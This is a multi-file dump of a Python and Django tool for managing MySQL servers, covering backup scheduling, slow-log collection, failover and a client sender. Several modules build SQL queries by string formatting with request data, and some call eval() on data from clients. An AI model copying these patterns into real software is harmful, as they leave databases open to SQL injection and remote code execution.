"length_bytes": 5266, "license_type": "no_license", "max_line_length": 62, "num_lines": 160, "path": "/src/mega_web/entity/entity.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "from django.db import models\n\n\nclass Server(models.Model):\n class Meta(object):\n db_table='server'\n \n id = models.AutoField(primary_key=True)\n ip = models.CharField(max_length=20)\n name = 
models.CharField(max_length=50)\n os = models.CharField(max_length=50)\n owner = models.CharField(max_length=50)\n online_date = models.DateTimeField(default=0)\n stat= models.IntegerField(default=1)\n type= models.IntegerField(default=1)\n plant= models.CharField(max_length=50)\n\nclass Instance(models.Model):\n class Meta(object):\n db_table='instance'\n \n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=50) \n server_id = models.IntegerField(null=False)\n ip = models.CharField(max_length=20) \n port = models.IntegerField(null=False)\n owner = models.IntegerField(default=0)\n level = models.IntegerField(default=1)\n business_id = models.IntegerField(default=0)\n #mysql oracle etc\n db_type = models.CharField(max_length=10)\n #none mha mmm keepalived\n ha_type = models.CharField(max_length=10)\n #1 master >1 slave\n role= models.IntegerField(default=1)\n \n version = models.CharField(max_length=20)\n master_id=models.IntegerField(default=0)\n slowlog= models.IntegerField(default=1)\n data_collect=models.IntegerField(default=0)\n cnf_file=models.CharField(max_length=200)\n stat= models.IntegerField(default=1)\n online_date = models.DateTimeField(default=0)\n\n\nclass Database(models.Model):\n class Meta(object):\n db_table='databases'\n \n id = models.AutoField(primary_key=True)\n instance_id = models.IntegerField(null=False)\n name = models.CharField(max_length=16)\n business_id = models.IntegerField()\n level = models.IntegerField()\n owner = models.IntegerField()\n stat= models.IntegerField(default=1)\n online_date = models.DateTimeField(default=0)\n\n\nclass User(models.Model):\n class Meta(object):\n db_table='user'\n \n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=32) \n #dba op diaosi\n role = models.IntegerField()\n sign = models.IntegerField()\n pwd = models.CharField(max_length=10)\n p_id = models.IntegerField()\n phone = models.IntegerField()\n stat= models.IntegerField(default=1)\n \nclass Business(models.Model):\n class Meta(object):\n db_table='business'\n \n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=16) \n owner = models.IntegerField()\n phone = models.IntegerField()\n stat= models.IntegerField(default=1)\n\nclass Backup_History_Info(models.Model):\n class Meta(object):\n db_table='backup_history_info'\n \nclass Backup_Policy(models.Model):\n class Meta(object):\n db_table='backup_policy'\n id = models.AutoField(primary_key=True)\n host_ip=models.CharField(max_length=20)\n port=models.IntegerField(default=0)\n db_type=models.CharField(max_length=20)\n backup_tool=models.CharField(max_length=20)\n backup_level=models.CharField(max_length=20)\n level_value=models.CharField(max_length=8000)\n backup_type=models.CharField(max_length=20)\n need_data=models.CharField(max_length=2)\n need_schema=models.CharField(max_length=2)\n iscompressed=models.CharField(max_length=2)\n isencrypted=models.CharField(max_length=2)\n retention=models.IntegerField()\n is_schedule=models.IntegerField()\n cycle=models.CharField(max_length=20)\n backup_time=models.CharField(max_length=45)\n schedule_time=models.CharField(max_length=45)\n modify_time=models.DateTimeField(auto_now=True)\n \nclass Users(models.Model):\n class Meta(object):\n db_table='user'\n \n id = models.AutoField(primary_key=True) \n name=models.CharField(max_length=20)\n role=models.CharField(max_length=20)\n sign=models.CharField(max_length=20)\n pwd=models.CharField(max_length=20)\n p_id=models.IntegerField(default=1)\n 
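The classes above are plain Django models, so they can be queried through the ORM. A hedged usage sketch, assuming the app is importable as mega_web.entity.models (the import path other modules in this repository use); the filter values below are illustrative:

    from mega_web.entity.models import Instance

    # online master instances, following the stat=1 / role=1 convention used above
    masters = Instance.objects.filter(stat=1, role=1).values('id', 'ip', 'port')
    for m in masters:
        print('%s:%s' % (m['ip'], m['port']))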
phone=models.IntegerField()\n stat=models.IntegerField()\n \nclass Vip(models.Model):\n class Meta(object):\n db_table='vip'\n \n id = models.AutoField(primary_key=True) \n vip = models.CharField(max_length=50)\n domain = models.CharField(max_length=50)\n type = models.IntegerField()\n stat = models.IntegerField()\n plant= models.CharField(max_length=50)\n\n \nclass Document(models.Model):\n class Meta(object):\n db_table='document'\n file = models.FileField(upload_to='documents/%Y/%m/%d') \n\nclass Task(models.Model):\n class Meta(object):\n db_table='task'\n id=models.AutoField(primary_key=True)\n name=models.CharField(max_length=20)\n type=models.IntegerField(default=1)\n value=models.CharField(max_length=100)\n last_time=models.DateTimeField()\n cycle=models.IntegerField(default=1)\n target=models.CharField(max_length=200)\n owner=models.IntegerField(default=1)\n script=models.CharField(max_length=50)\n stat=models.IntegerField(default=1)\n create_time=models.DateTimeField(auto_now=True)\n\nclass Client(models.Model):\n class Meta(object):\n db_table='client'\n server_id=models.IntegerField(primary_key=True)\n version=models.CharField(max_length=20)\n heartbeat=models.DateTimeField(auto_now=True)" }, { "alpha_fraction": 0.6038960814476013, "alphanum_fraction": 0.6179653406143188, "avg_line_length": 24, "blob_id": "8e84ddf74e8f92a872a6fd7a41004cfe4d48c9e3", "content_id": "82296ec0df99a5780aa6e41bc977ddd18bd0c29b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 924, "license_type": "no_license", "max_line_length": 108, "num_lines": 37, "path": "/src/mega_service/resource/get_value.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Oct 20, 2014\n\n@author: xchliu\n\n@module:mega_service.resource.test\n'''\nfrom lib.PyMysql import PyMySQL\n\ndef get_instance_newest_stat(instance_id,stat): \n q=PyMySQL() \n sql=\"select b.value from status a,status_his b where a.id=b.status_id and b.instance_id=%s and \\\n a.name='%s' order by b.id desc limit 1;\" % (instance_id,stat)\n result=q.fetchRow(sql)\n if result:\n result=result[0]\n else:\n result=0\n return result\n\ndef get_instance_newest_variable(instance_id,var): \n q=PyMySQL() \n sql=\"select b.value from variables a,variables_his b where a.id=b.variable_id and b.instance_id=%s and \\\n a.name='%s' order by b.id desc limit 1;\" % (instance_id,var)\n result=q.fetchRow(sql)\n if result:\n result=result[0]\n else:\n result=0\n return result\n\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.3851657509803772, "alphanum_fraction": 0.39542093873023987, "avg_line_length": 54.18421173095703, "blob_id": "e062b5528c80f5b7d8b6d26c01586e5b806f74f1", "content_id": "cbe0c4bc8bb95520ea854d390204a18c112377cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4263, "license_type": "no_license", "max_line_length": 180, "num_lines": 76, "path": "/src/mega_service/report/daily.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Sep 23, 2014\n\n@author: xchliu\n\n@module:mega_service.report.daily\n'''\nimport sys\nsys.path.append(\"/export/servers/app/mega/src/\")\nfrom lib.utils import today\nfrom lib.utils import SendMail\nfrom lib.PyMysql import PyMySQL\nfrom mega_web.console.backup import Backup\n\nMODEL='mega_daily_report'\n\ndef backup_report_daily(date=None):\n if not date:\n 
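The helpers in get_value.py above return the most recently collected sample for a named status counter or variable. A hedged usage sketch — the import path follows the file's location, and the instance id and counter/variable names are illustrative, not values taken from this repository:

    from mega_service.resource.get_value import (get_instance_newest_stat,
                                                  get_instance_newest_variable)

    instance_id = 42    # hypothetical instance id
    threads = get_instance_newest_stat(instance_id, 'Threads_connected')
    bp_size = get_instance_newest_variable(instance_id, 'innodb_buffer_pool_size')
    print('threads=%s buffer_pool=%s' % (threads, bp_size))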
date=today(1)\n subject='Backup Daily Report for %s' % date\n temail=['[email protected]','[email protected]','[email protected]']\n sql=\"select host_ip,port,backup_tool,backup_level,backup_type,timediff(backup_end_time,backup_begin_time) as backup_time,file_size,message,backup_status \\\n from backup_history_info where date(backup_begin_time)='%s' order by backup_tool,host_ip;\" % date\n _cursor=PyMySQL().query(sql,'dict')\n if _cursor:\n _data=_cursor.fetchall()\n _statics_today=Backup().get_today_statics(date)\n _uninvoked_task=Backup().get_uninvoked_backup(date)\n\n #generate the email content\n head='<h3>配置总数:%s</h3><h4>备份成功:%s &#9; 备份失败:%s &#9; 备份未发起:%s</h4>' %(_statics_today.get('total_today',0),_statics_today.get('success_count',0),\n _statics_today.get('failure_count',0),\n (_statics_today.get('total_today',0)-(_statics_today.get('success_count',0)+_statics_today.get('failure_count',0)))\n )\n body='<table><tr bgcolor=\"#E6EED5\"><td></td><td>IP</td><td>PORT</td><td>工具</td><td>级别</td><td>类型</td><td>时间</td><td>大小(MB)</td><td>结果</td><td>消息</td></tr>'\n footer='<b>More Info:<a href=\"http://mega.db.cbpmgt.com/console/backup/\">mega</a><b>'\n data=''\n alt =True\n counts=1\n for _d in _data:\n if _d.get('backup_status') == 'Y':\n color='bgcolor=\"#FFFFFF\"' if alt else 'bgcolor=\"#E6EED5\"'\n else:\n color='bgcolor=\"#FF4500\"'\n data +='<tr %s><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s </td><td>%s</td><td>%s</td></tr>' %(\n color,counts,\n _d.get('host_ip'),_d.get('port'),\n _d.get('backup_tool'),_d.get('backup_level'),\n _d.get('backup_type'),_d.get('backup_time'),\n _d.get('file_size'),_d.get('backup_status'),\n _d.get('message')\n )\n alt=not alt\n counts+=1\n un_data='<hr>Uninvoked backup:<table>'\n counts=1\n for _t in _uninvoked_task:\n color='bgcolor=\"#FFE4E1\"'\n un_data +='<tr %s><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s</td><td>%s </td></tr>' %(\n color,counts,\n _t[1],_t[2],_t[4],_t[5],\n _t[7],_t[14],_t[16]\n )\n counts+=1\n un_data+='</table>'\n body=head+footer+body+str(data)+'</table>'+str(un_data)\n content=str(body)\n result,msg=SendMail(MODEL).sendmail(subject, content, temail)\n\n\ndef main():\n backup_report_daily()\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.6313725709915161, "alphanum_fraction": 0.6529411673545837, "avg_line_length": 19.440000534057617, "blob_id": "e662370712c6390485132c6079a92dc0966a1a39", "content_id": "fab46a7272ff6b13295fa062e3033a0c9c57c383", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 510, "license_type": "no_license", "max_line_length": 44, "num_lines": 25, "path": "/src/mega_web/entity/report.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Aug 18, 2014\n\n@author: xchliu\n\n@module:mega_web.entity.report\n'''\nfrom django.db import connection, models\n \nclass SlowLog(models.Model):\n class Meta(object):\n db_table='report_slowlog'\n \n id = models.AutoField(primary_key=True)\n instance_id=models.IntegerField()\n dbname=models.CharField(max_length=50)\n stattime=models.CharField(max_length=50)\n counts=models.IntegerField()\n \n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5453044176101685, "alphanum_fraction": 0.5493156909942627, "avg_line_length": 36.486724853515625, "blob_id": "1addadc1a403aff1067626b7751392a861147750", "content_id": 
"ae227248a13fac068e5bfcc16ca5cb57de4da90f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12714, "license_type": "no_license", "max_line_length": 154, "num_lines": 339, "path": "/src/apis/manage.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import types\nfrom mega_service.backup import Backuper\nfrom mega_service.slowlog.slow_log import SlowLog\nfrom mega_service.slowlog.slowlog_archive import slowlog_pack,slowlog_statics_per_hour\nfrom mega_service.task import Task\nfrom mega_service.resource import sync_baseinfo,sync_stat\nfrom mega_web.resource.instance_manage import InstanceGet\nfrom lib.logs import Logger\nfrom lib.PyMysql import PyMySQL\nfrom task import remote_cmd\n\nMODEL='API-manage'\nlog = Logger(MODEL).log()\n\n\n\ndef backup_routine(time=None,**args):\n instance_list=[]\n config_list=Backuper().backuper(time)\n for inst in config_list:\n inst_id=inst[0]\n inst_ip=inst[1]\n inst_port=inst[2]\n instance={\n 'id' : inst_id, \n 'host_ip' : inst_ip, \n 'port' : inst_port, \n 'db_type' : inst[3], \n 'backup_tool' : inst[4], \n 'backup_level': inst[5], \n 'level_value' : inst[6], \n 'backup_type' : inst[7], \n 'need_data' : inst[8], \n 'need_schema' : inst[9], \n 'Iscompressed': inst[10], \n 'isEncrypted' : inst[11], \n 'retention' : inst[12], \n } \n instance_list.append(instance)\n len_inst=len(instance_list)\n result=[]\n if len_inst>0:\n script=Task().get_task_by_name('backup')\n for instance in instance_list:\n result.append(remote_cmd(instance['host_ip'],instance['port'],script,'python',args=instance))\n len_result=len(result)\n if result:\n log.debug(result)\n if len_inst >0:\n log.debug(instance_list)\n if len_inst==len_result :\n log.info(\"%s backup tasks are invoked.\",len_inst)\n else:\n log.warn(\"%s backup tasks are invoked,%s are successed.\" %(len_inst,len_result))\n\ndef update_backupinfo(task_info,action='INSERT'):\n '''\n task_info : update items\n action: INSERT OR UPDATE \n \n return :\n task id : insert or update success\n False : unexpected errors occurs\n '''\n if not task_info :\n return False\n\n db_conn=PyMySQL()\n task=eval(str(task_info))\n if action.upper()=='INSERT':\n columns=\"host_ip,port,db_type,backup_tool,backup_level,level_value,backup_type,need_data,need_schema,status,rsync,message,backup_status,is_delete\"\n values=[]\n data=(columns,)\n for c in columns.split(','):\n _d=task.get(c)\n if _d:\n values.append(_d)\n else:\n values.append('')\n data=data+tuple(values)\n sql=\"insert into backup_history_info(%s)\\\n values('%s',%s,'%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s');\" % data \n db_conn.execute(sql)\n task_id=db_conn.fetchOne(\"select last_insert_id()\")\n log.debug(sql)\n log.debug(\"New backup task id : %s \" %task_id)\n return task_id\n else:\n id=task.get(\"id\")\n if not id:\n return False\n columns=\"status,is_delete,backup_begin_time,backup_end_time,rsync_begin_time,rsync_end_time,file_size,message,backup_status\"\n values=[]\n data=\"\"\n for c in columns.split(','):\n _d=task.get(c)\n if _d:\n data=data+c+\" = '\" + str(_d) + '\\' ,'\n data=data.rstrip(',')\n sql=\"update backup_history_info set %s where id=%s\" %(data,id)\n log.debug(sql)\n rows,msg=db_conn.execute(sql) \n if rows or rows==0:\n if msg:\n log.debug(msg)\n return id\n else:\n log.warn(\"Update task %s : \" % id +str(msg))\n return False\n return False\n\ndef add_slow_log(log_info):\n if not log_info:\n return False \n db_conn=PyMySQL()\n if not db_conn:\n 
log.error('Failed connect to db server!')\n return False\n task=eval(str(log_info))\n log.debug(task)\n if type(task) != types.DictionaryType:\n log.error('Failed to revert slow log data to dict !')\n return False\n columns=\"db_host,port,start_time,user,user_host,Query_time,lock_time,Rows_sent,Rows_examined,sql_text,sql_explained,dbname\"\n values=[]\n for c in columns.split(','):\n _d=task.get(c)\n if _d:\n _d='\"'+str(_d)+'\"'\n values.append(_d)\n else:\n values.append(\"''\")\n #todo \n #add proxy func \n table_name='slowlog_info'\n sql=\"insert into %s(%s) values(%s)\" %(table_name,columns,','.join(values))\n log.debug(sql)\n result,ex=db_conn.execute(sql)\n if result:\n task_id=db_conn.fetchOne(\"select last_insert_id()\")\n log.debug('New slow log task id: %s' % task_id)\n else:\n task_id=0\n log.error(ex)\n return task_id\n\ndef slowlog_routine(time=None):\n instance_list=[] \n config_list=SlowLog().get_slowlog_instance_list()\n log.debug(config_list)\n for conf in config_list:\n instance={\"id\":conf.get('id'),\n \"ip\":conf.get('ip'),\n \"port\":conf.get('port'),\n \"version\":conf.get('version')\n }\n instance_list.append(instance)\n inst_len=len(instance_list) \n result=[]\n if inst_len>0:\n script=Task().get_task_by_name('slowlog')\n for instance in instance_list:\n# log.debug(instance)\n result.append(remote_cmd(instance['ip'],instance['port'],script,'python',args=instance))\n if inst_len >0:\n log.debug(instance_list)\n if result:\n log.debug(result)\n log.info('%s instance slow log collect tasks are invoked.' % inst_len)\n\ndef slowlog_statics(time=None):\n #get the slow log in the prior hour \n #undo slow log\n sql=\"select * from slowlog_info where stat=0 limit 100\" \n while 1:\n try:\n conn=PyMySQL()\n cursor=conn.query(sql, type='dict')\n if not cursor:\n break\n data_list=cursor.fetchall()\n if not data_list or len(data_list)==0:\n log.warn('None slow log found!')\n break\n log.info('%s slow log will be computed.' 
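add_slow_log above expects a dict whose keys match the columns it copies into slowlog_info. A hedged sketch of submitting one record through the mega_client sender documented elsewhere in this repository; the sample figures are illustrative, and passing the dict as repr(...) in func_args is an assumption about how the argument string is interpolated server-side:

    from mega_client import sender
    from mega_client.setting import MEGA_HOST

    record = {
        'db_host': '127.0.0.1', 'port': 3306, 'dbname': 'test',
        'start_time': '2014-08-01 10:00:00',
        'user': 'xchliu', 'user_host': '127.0.0.1',
        'Query_time': 2.2, 'lock_time': 0.0,
        'Rows_sent': 10, 'Rows_examined': 1000,
        'sql_text': 'select 1', 'sql_explained': '{}',
    }
    c = sender.MegaClient(host=MEGA_HOST, cmd='add_slow_log')
    result = c.run(func_args=repr(record))   # new slowlog_info id, 0 on failure
    c.close()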
% len(data_list))\n #add hash_code and instance to each log\n for data in data_list: \n sql_hash=slowlog_pack(data.get('sql_text'))\n instance_id=InstanceGet().get_instance_by_ip_port(data.get('db_host'), data.get('port'))\n if not instance_id:\n log.warn('Unknown Instance: %s' %([data.get('db_host'), data.get('port')]))\n instance_id=0\n else:\n instance_id=instance_id[0]['id']\n _sql=\"update slowlog_info set hash_code='%s',instance_id=%s,stat=1 where id = %s\" %(sql_hash,instance_id,data.get('id'))\n result,ex=conn.execute(_sql)\n if not result:\n log.error(ex)\n conn.close()\n except Exception as ex:\n log.debug(data)\n log.error('Pack slow log failed:%s' % ex)\n break\n # do the hourly statics \n try:\n slowlog_statics_per_hour(time)\n except Exception as ex:\n log.error('Statics slow log hourly failed:%s' % ex) \n\ndef update_ha_info(new_master,old_master):\n '''\n switch the role inside a ha group\n master format:'1.1.1.1:3306' \n '''\n log.info('swith master role from %s to %s' % (old_master,new_master))\n try:\n _new_host,_new_port=new_master.split(':')\n _old_host,_old_port=old_master.split(':')\n _new_instance_id=InstanceGet().get_instance_by_ip_port(_new_host, _new_port)\n _old_instance_id=InstanceGet().get_instance_by_ip_port(_old_host,_old_port)\n if not _old_instance_id: \n log.error('Instance not found' % _old_instance_id )\n return False \n if not _new_instance_id:\n log.error('Instance not found' % _new_instance_id )\n return False \n _new_instance_id=_new_instance_id[0].get('id')\n _old_instance_id=_old_instance_id[0].get('id') \n _new_instance=InstanceGet().get_instance_by_id(_new_instance_id)\n #if the new master is master already,return false\n if _new_instance.get('role') == 1:\n log.warn(\"Instance %s is already master!\" % new_master)\n return False\n if _new_instance.get('master_id') == _old_instance_id:\n #change the master id for the slaves\n sql=\"update instance set master_id=%s where master_id=%s\" %(_new_instance_id,_old_instance_id)\n result,ex=PyMySQL().execute(sql)\n if not result:\n return False \n log.error(ex)\n #change the old master stat\n sql=\"update instance set master_id=%s,role=2 where id=%s\" %(_new_instance_id,_old_instance_id)\n result,ex=PyMySQL().execute(sql)\n if not result:\n return False \n log.error(ex)\n #change the new master role\n sql=\"update instance set role=1 where id=%s\" %(_new_instance_id)\n result,ex=PyMySQL().execute(sql)\n if not result:\n return False \n log.error(ex) \n else:\n log.error(\"%s 's master id is %s ,not %s\" %(new_master,_new_instance.get('master_id'),_old_instance_id)) \n except Exception as ex: \n log.error('update ha info failed:%s' % ex)\n return False\n return True\n\ndef data_collect(time=None):\n '''\n collect the base info and performance data from all the online instance which data collect configuration is on\n type:\n base: collect the basic information for the instance ,will be called one time per day\n stat: collect the status infomation \n '''\n #\n type=\"base\"\n result=[] \n instance_list=[]\n if time:\n if int(time.split(\":\")[0]) == 0:\n type=\"stat\" \n filter={'i.stat':1,'i.data_collect':1}\n config_list=InstanceGet().get_instance_list(filter, 0)\n for conf in config_list:\n instance={\"ip\":conf.ip,\n \"port\":conf.port,\n \"type\":type \n }\n instance_list.append(instance)\n if len(instance_list):\n log.debug(instance_list)\n script=Task().get_task_by_name('datacollect')\n for instance in instance_list:\n 
result.append(remote_cmd(instance['ip'],instance['port'],script,'python',args=instance))\n if result:\n log.debug(result)\n log.info(\"%s instance data collect task are invoked.\" % len(instance_list)) \n\ndef data_collect_save(data):\n '''\n parse the data collect from the client script,split the values by the keys\n \n keys:\n base=['variables','table_status','mysql_user','db_name','base']+['timestamp']+['except']\n state=['status','slave_status']+['timestamp']+['except'] \n '''\n # pre-check for safe and translate the str to a dict\n _keys=['variables','table_status','mysql_user','db_name','base','timestamp','except','status','slave_status']\n try:\n data=eval(str(data))\n if type(data) != types.DictionaryType:\n log.warn('Inexpectant data format as type of the data is %s' % type(data))\n return False \n #get instance id\n instance=data.keys()[0]\n ip,port=instance.split(\":\")\n instance_id=InstanceGet().get_instance_by_ip_port(ip, port)\n if not instance_id:\n log.error('Failed to get instance id for %s:%s' % (ip,port)) \n return False \n instance_id=instance_id[0]['id']\n instance_data=data.get(instance)\n #caught the exception return by the script\n script_except=instance_data.pop('except',None)\n if type(instance_data) != types.DictionaryType:\n log.error(\"Invalid data format for %s\" % instance)\n return False\n if script_except:\n log.warn(\"Data collect on %s : %s\" % (instance,script_except))\n #save the data into database \n collect_time=instance_data.pop('timestamp',None)\n _sync=sync_baseinfo.SyncBasic(instance_id,instance,collect_time)\n for _k in _keys: \n if instance_data.get(_k):\n _sync.sync_base(instance_data.pop(_k),_k) \n except Exception as ex:\n log.error(ex)\n return False\n return True\n \n\n \ndef main():\n return\n\nif __name__ == \"__main__\":\n main() " }, { "alpha_fraction": 0.35559922456741333, "alphanum_fraction": 0.3614931106567383, "avg_line_length": 23.261905670166016, "blob_id": "282a9d7defae43301101525832ca3bed557dae2f", "content_id": "43ced9ebd8d134a816215e320b8592458e224837", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1018, "license_type": "no_license", "max_line_length": 65, "num_lines": 42, "path": "/src/mega_web/charts/visit.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 4, 2014\n\n@author: xchliu\n\n@module:mega_web.charts.visit\n'''\nfrom mega_web.entity.models import Server\nfrom chartit import DataPool, Chart\n\ndef Visit(request):\n weatherdata = \\\n DataPool(\n series=\n [{'options': {\n 'source': Server.objects.all()},\n 'terms': [\n 'id',\n 'ip'\n ]}\n ])\n \n cht = Chart(\n datasource = weatherdata,\n series_options =\n [{'options':{\n 'type': 'line',\n 'stacking': True},\n 'terms':{\n 'ip': [\n 'id'\n ]\n }},\n ],\n chart_options =\n {'title': {\n 'text': 'Weather Data of Boston and Houston'},\n 'xAxis': {\n 'title': {\n 'text': 'Month number'}}})\n return cht" }, { "alpha_fraction": 0.6203492879867554, "alphanum_fraction": 0.6332573890686035, "avg_line_length": 27.88888931274414, "blob_id": "07439472ecfbabe0a2e047be5bb5f8b24353852e", "content_id": "fa6b4252373a44a27e8cfd1a9690530a2396f22b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1317, "license_type": "no_license", "max_line_length": 105, "num_lines": 45, "path": "/src/mega_web/lib/meta_data.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "'''\nCreated on Jul 1, 
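data_collect_save above expects the collector script to report a single-key dict — 'ip:port' mapped to the collected sections plus 'timestamp' and 'except'. A hedged sketch of a minimal stat-type payload; the address and values are illustrative:

    payload = {
        '10.0.0.1:3306': {                       # hypothetical instance address
            'timestamp': '2014-10-22 00:05:00',  # popped as the collect time
            'except': None,                      # exception text from the collector, if any
            'status': {'Threads_connected': '12', 'Uptime': '86400'},
            'slave_status': {},                  # empty when the instance is a master
        }
    }

For the daily base run the inner sections would instead be 'variables', 'table_status', 'mysql_user', 'db_name' and 'base', matching the key list the function checks.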
2014\n\n@author: xchliu\n'''\nfrom conf import GlobalConf\nfrom mega_web.resource import business_manage,user_manage,instance_manage,vip_manage,server_manage\n\nclass MetaData(object):\n '''\n classdocs\n '''\n def __init__(self):\n '''\n Constructor\n '''\n db_type=GlobalConf.DB_TYPE\n ha_type=GlobalConf.HA_TYPE\n level=GlobalConf.LEVEL\n version=GlobalConf.VERSION\n os=GlobalConf.OS\n failover_method=GlobalConf.FAILOVER\n plant_list=GlobalConf.PLANT\n\n def business_list(self):\n return business_manage.BusinessGet().get_business_list(None,count=1000).values()\n \n def owner_list(self):\n return user_manage.UserGet().get_user_list(None,count=0)\n \n def instance_list(self,filter=None):\n return instance_manage.InstanceGet().get_instance_list(filter,count=0) #.values(\"id\",\"ip\",\"port\")\n\n def vip_list(self,type=None):\n wvips=vip_manage.VipGet().get_vip_list(count=0)\n rvips=vip_manage.VipGet().get_vip_list(type=2,count=0)\n if type==1:\n return wvips\n elif type == 2:\n return rvips\n else:\n return list(wvips)+list(rvips)\n \n def server_list(self,filter=None):\n return server_manage.ServerGet().get_server_list(filter,count=0)\n \n " }, { "alpha_fraction": 0.5467349290847778, "alphanum_fraction": 0.5486555695533752, "avg_line_length": 32.956520080566406, "blob_id": "aa8357be52deaa89298de9ed064f981e3acbedd9", "content_id": "7898427921bf76f835c26422eeba52d43db455c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1562, "license_type": "no_license", "max_line_length": 160, "num_lines": 46, "path": "/src/mega_service/backup.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import time\nfrom lib.logs import Logger\nfrom mega_web.entity.models import Backup_Policy\nfrom lib.PyMysql import PyMySQL\n\nMODEL='BACKUP'\nlog=Logger(MODEL).log()\n\nclass Backuper():\n def __init__(self):\n self.backup_policy=Backup_Policy\n self.q=PyMySQL()\n def backuper(self,now=None):\n '''\n retrun the server list which need to run backup right now\n '''\n if not now:\n now=time.strftime('%H:%M',time.localtime(time.time()))\n server_list = self.get_task(now)\n return server_list\n\n def get_task(self,now):\n #daily ,weekly,monthly\n _data=[]\n _now={}\n _now[\"day\"]=time.strftime('%H:%M',time.localtime(time.time()))\n _now[\"week\"]=time.strftime('%a',time.localtime(time.time()))\n _now[\"month\"]=time.strftime('%d',time.localtime(time.time()))\n for _n in _now:\n if _n == 'day': \n sql=\"select * from backup_policy where cycle='%s' and schedule_time='%s' and is_schedule=1\" %(_n,now)\n else:\n sql=\"select * from backup_policy where cycle='%s' and find_in_set('%s',backup_time) and schedule_time='%s' and is_schedule=1\" %(_n,_now[_n],now)\n #_d=self.backup_policy .objects.raw(sql)\n _d=self.q.fetchAll(sql)\n for _ob in _d:\n _data.append(_ob)\n if len(_data)>0:\n log.debug('Get backup task:')\n log.debug(_data)\n return _data\n \n def push_task(self):\n pass\n def log_task(self):\n pass\n" }, { "alpha_fraction": 0.6258351802825928, "alphanum_fraction": 0.6458797454833984, "avg_line_length": 23.77777862548828, "blob_id": "c82a196d4b6547af9e5371a28ef6baff939b555b", "content_id": "6aa1f849fa4e0d298cb3e52cfb80d2f754168b8a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 631, "license_type": "no_license", "max_line_length": 74, "num_lines": 18, "path": "/docs/bugs.md", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "\n#Created on Jul 7, 2014\n\n@author: 
xchliu\n\n## 备份重复发起\n由于时间临界点问题,导致一个备份在一次调用中2次运行,上一分钟59秒tracker 获取任务,下一秒进入api调用时使用下一分钟时间,则造成2次调用\n\n修复:\n\t\n\ttracker 获取任务并获取当前时间,作为参数传送给具体参数\n\t def backuper(self,now=None):\n '''\n retrun the server list which need to run backup right now\n '''\n if not now:\n now=time.strftime('%H:%M',time.localtime(time.time()))\n server_list = self.get_task(now)\n return server_list\n\n\n" }, { "alpha_fraction": 0.5675050020217896, "alphanum_fraction": 0.570135772228241, "avg_line_length": 39.61538314819336, "blob_id": "b672488225ac2c55a1acc7fd4b7f922678c92fe3", "content_id": "ec87842cf725fd03494f0e0828f4fb75c27ffe29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9507, "license_type": "no_license", "max_line_length": 226, "num_lines": 234, "path": "/src/mega_web/console/failover.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Sep 2, 2014\n\n@author: xchliu\n\n@module:mega_web.console.failover\n'''\nfrom lib.utils import now\nfrom lib.PyMysql import PyMySQL\nfrom apis.task import remote_cmd\nfrom conf.GlobalConf import MSG_ERR_SERVER_EXITST,MSG_ERR_NAME\nfrom mega_web.resource.instance_manage import InstanceGet\n\nfrom lib.logs import Logger\n\nMODEL='web-failover'\nlog=Logger(MODEL).log()\n\nclass FailoverManage():\n '''\n '''\n def __init__(self,request):\n self.q=PyMySQL()\n if request:\n self.name=request.get('name')\n self.type=request.get('type')\n self.wvip=request.get('wvip')\n self.rvip=request.get('rvip')\n self.master=request.get('master')\n self.manager=request.get('manager')\n self.id=request.get('id') \n \n def _data_check(self):\n if not self.name:\n return False\n if not self.rvip:\n self.rvip=0\n return True\n \n def _check_ifexist(self):\n sql=\"select id from failover where name='%s'\" % self.name\n id=self.q.fetchOne(sql)\n if id:\n return id\n return False\n \n def add_failover(self):\n if not self._data_check():\n return False,MSG_ERR_NAME\n if self._check_ifexist():\n return False,MSG_ERR_SERVER_EXITST\n sql=\"insert into failover(name,master,manager,rvip,wvip,type) values('%s',%s,%s,%s,%s,%s)\" %(self.name,self.master,self.manager,self.rvip,self.wvip,self.type)\n print sql\n result,ex=self.q.execute(sql)\n if not result:\n return False,ex\n return True,''\n \n def mod_failover(self):\n if not self._data_check():\n return False,MSG_ERR_NAME\n id=self._check_ifexist()\n if not self.id or not id:\n return False,'NOT FOUND'\n if int(id)!=int(self.id):\n return False,MSG_ERR_SERVER_EXITST\n sql=\"update failover set 